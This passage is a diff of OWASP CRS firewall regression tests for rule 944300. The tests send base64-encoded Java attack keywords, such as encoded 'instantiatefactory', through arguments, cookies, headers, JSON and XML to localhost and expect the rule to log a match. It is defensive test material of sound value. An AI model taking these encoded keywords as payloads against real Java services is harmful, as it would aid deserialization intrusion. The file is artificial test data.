"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 110 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 111 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 112 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log: + expect_ids: [944300] + - test_id: 113 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 114 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GZvcmNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 115 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 116 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 117 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 118 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 119 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 120 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GZvcmNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log: + expect_ids: [944300] + - test_id: 121 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GZvcmNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 122 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 123 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log: + expect_ids: [944300] + - test_id: 124 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 125 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bmb3JjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 126 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 127 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 128 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 129 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 130 desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log: + expect_ids: [944300] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 133 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 134 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 135 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 136 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: 